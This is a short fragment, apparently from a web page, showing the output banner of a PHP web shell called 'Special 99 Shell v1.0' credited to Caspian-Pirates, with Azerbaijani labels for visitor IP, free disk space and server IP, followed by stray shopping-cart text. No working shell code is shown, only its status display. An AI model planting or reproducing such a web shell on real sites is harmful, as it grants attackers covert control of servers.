  • Sizin Ip'niz
  • : ".$_SERVER['REMOTE_ADDR']."
  • Bos Həcm
  • : ".view_size($free)."
  • Server
  • : ".gethostbyname($_SERVER['HTTP_HOST'])."
  • Bos Faiz
  • : %".$free_percent."
  • Dəstək Server
  • : http://www.caspian-pirates.org

    ";
    ?>


    [ Special 99 Shell
    v1.0 || Developing by


    ฬaђเtє_ฬ๏lŦ

    ||
    Caspian-Pirates.OrG
    ]

    +

    0
    YOUR CART
    • No products in the cart.